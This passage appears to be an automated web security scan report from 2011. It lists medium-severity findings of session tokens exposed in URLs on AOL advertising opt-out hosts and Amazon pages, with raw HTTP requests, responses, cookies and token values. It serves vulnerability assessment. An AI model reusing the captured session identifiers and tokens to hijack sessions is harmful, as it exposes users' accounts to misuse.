Cookie: OO_TOKEN=1170877546; GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; ACID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bgg4i5EBAAAABAAAAIAAgEA; BASE=oTwUjn8fYrESn1x8Qj3fRMC!; ROLL=XpwfbsHr/Y/PQCLUeRRTttG!; aceRTB=rm%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cam%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cdc%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Can%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Crub%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7C

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:21:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/0/4/3/
Expires: Sun, 04 Sep 2011 11:21:58 GMT
Content-Length: 0
Content-Type: text/html


12.14. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=592246145 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=592246145

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:19:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/8/4/3/
Expires: Sun, 04 Sep 2011 11:19:02 GMT
Content-Length: 0
Content-Type: text/html


12.15. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=2011729621 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=2011729621; eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:19:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/2/4/3/
Expires: Sun, 04 Sep 2011 11:19:53 GMT
Content-Length: 0
Content-Type: text/html


12.16. http://www.amazon.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:16 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sun, 04-Sep-2011 04:23:16 GMT
x-amz-id-1: 19A6WP3ZDHGN69NMDWGD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: WttjoioY2sh+9lVqwvX+MQ2r9X2rIBXb/ay0wwdr2lLUBl2LD2VMSFtd29Gdj24p
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 211142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<!-- oi -->
<script type='text/
...[SNIP]...
<li class="nav_pop_li nav_divider_before"><a href="https://www.amazon.com:443/gp/redirect.html/ref=sa_menu_kcr3?location=https://read.amazon.com/&amp;token=34AD60CFC4DCD7A97D4E2F4A4A7C4149FBEEF236" class="nav_a">Kindle Cloud Reader</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

12.17. http://www.amazon.com/dp/0307387178  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0307387178

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dp/0307387178 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:24 GMT
Server: Server
x-amz-id-1: 06V0VK7T640CVMJZMPAD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 440636


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_90Vyob0VV760V?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0307387178%2Fref%3Dcm_sw_r_fa_dp_90Vyob0VV760V%26bodytext%3DInto%2520the%2520Wild%2520by%2520Jon%2520Krakauer" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_90Vyob0VV760V?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0307387178%2Fref%3Dcm_sw_r_fa_dp_90Vyob0VV760V%26bodytext%3DInto%2520the%2520Wild%2520by%2520Jon%2520Krakauer', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_90Vyob0VV760V?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0307387178%252Fref%253Dcm_sw_r_tw_dp_90Vyob0VV760V%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DInto%2520the%2520Wild%2520by%2520Jon%2520Krakauer%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0307387178%2Fref%3Dcm_sw_r_tw_dp_90Vyob0VV760V%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_90Vyob0VV760V?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0307387178%252Fref%253Dcm_sw_r_tw_dp_90Vyob0VV760V%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DInto%2520the%2520Wild%2520by%2520Jon%2520Krakauer%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2F0307387178%2Fref%3Dcm_sw_r_tw_dp_90Vyob0VV760V%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R127B12Z2CG86K/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DB8A58C5745EFF9C539F26EEACEBD9616C657F09&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R127B12Z2CG86K.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R127B12Z2CG86K/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9728E98278D495780412A306B80B5B30F1BA2291&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R127B12Z2CG86K.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R127B12Z2CG86K/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C87A504C189986CCBFB7317F6F6849139E54F8BF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R127B12Z2CG86K.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2GOCS3BB86GBX/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4ABECCB9C35CB0298D478DEF49A30ED6E05440AF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2GOCS3BB86GBX.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2GOCS3BB86GBX/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5C4425A30B857FCB945D09E04667BB22DEA77ADD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2GOCS3BB86GBX.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2GOCS3BB86GBX/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=1E6F5B8AA03CC812E39BC5D3764EB674D68431C9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2GOCS3BB86GBX.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R8O2DEWUTYS3L/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2361A88A7F8FA4F60D223CBC35F0CC124203B78F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R8O2DEWUTYS3L.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R8O2DEWUTYS3L/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=23584A0819CAF30AFC5E670220867069E4E53AE1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R8O2DEWUTYS3L.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R8O2DEWUTYS3L/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=88206F102FF86C8661A4D6E6B54588FABFAA0AB4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMwNzM4NzE3OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R8O2DEWUTYS3L.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
<li class="nav_pop_li nav_divider_before"><a href="https://www.amazon.com:443/gp/redirect.html/ref=sa_menu_kcr3?location=https://read.amazon.com/&amp;token=34AD60CFC4DCD7A97D4E2F4A4A7C4149FBEEF236" class="nav_a">Kindle Cloud Reader</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

12.18. http://www.amazon.com/dp/B000QRIGLW  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000QRIGLW

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dp/B000QRIGLW HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:26 GMT
Server: Server
x-amz-id-1: 03S8EAPH3K6YF11YT9YV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: pnFrqXFVhOgn+/67/Tzl/odSUVfgeUp2Gzj76Ud48X9whwHLThJ0G9B+YIPiCzwB
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 421771


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...
<li class="nav_pop_li nav_divider_before"><a href="https://www.amazon.com:443/gp/redirect.html/ref=sa_menu_kcr3?location=https://read.amazon.com/&amp;token=34AD60CFC4DCD7A97D4E2F4A4A7C4149FBEEF236" class="nav_a">Kindle Cloud Reader</a>
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_.0Vyob0SEP36F?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB000QRIGLW%2Fref%3Dcm_sw_r_fa_dp_.0Vyob0SEP36F%26bodytext%3DTwilight%2520(The%2520Twilight%2520Saga%252C%2520Book%25201)%2520by%2520Stephenie%2520Meyer" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_.0Vyob0SEP36F?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB000QRIGLW%2Fref%3Dcm_sw_r_fa_dp_.0Vyob0SEP36F%26bodytext%3DTwilight%2520(The%2520Twilight%2520Saga%252C%2520Book%25201)%2520by%2520Stephenie%2520Meyer', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_.0Vyob0SEP36F?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000QRIGLW%252Fref%253Dcm_sw_r_tw_dp_.0Vyob0SEP36F%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DTwilight%2520(The%2520Twilight%2520Saga%252C%2520Book%25201)%2520by%2520Stephenie%2520Meyer%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB000QRIGLW%2Fref%3Dcm_sw_r_tw_dp_.0Vyob0SEP36F%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_.0Vyob0SEP36F?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000QRIGLW%252Fref%253Dcm_sw_r_tw_dp_.0Vyob0SEP36F%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DTwilight%2520(The%2520Twilight%2520Saga%252C%2520Book%25201)%2520by%2520Stephenie%2520Meyer%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB000QRIGLW%2Fref%3Dcm_sw_r_tw_dp_.0Vyob0SEP36F%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1OUNYYH6KE691/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=80A2AE5088715985FCF27A9E2486DE9D10BB8359&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1OUNYYH6KE691.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1OUNYYH6KE691/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5F2F41FAC7729A86CEDBF980AC418D158EAA09EE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1OUNYYH6KE691.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1OUNYYH6KE691/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9CB029C067483E6D7AC7D76C7DFB4576A84512E0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1OUNYYH6KE691.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NH693F6JOBOC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=93366DC12A6B484EC3EC24A71029328CF675ABAE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1NH693F6JOBOC.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NH693F6JOBOC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=D78C7D8B246E85AE85C6D18E7A4C220C71BA6495&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1NH693F6JOBOC.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NH693F6JOBOC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=1084FD68D8A00DB5D73C8FAE9B9E74C9696D304E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1NH693F6JOBOC.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSRWCQQ2MKHJZ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B9CCA0CD3766AD9B7A3C415B895D1432F10FA7B2&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RSRWCQQ2MKHJZ.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSRWCQQ2MKHJZ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4E4FCDC56CBF2BEDAF106E757376CBA84B87CD81&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RSRWCQQ2MKHJZ.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSRWCQQ2MKHJZ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C789E7A122B7DE996EAD957B3B2A8B9FA220D7BA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMFFSSUdMVy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RSRWCQQ2MKHJZ.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
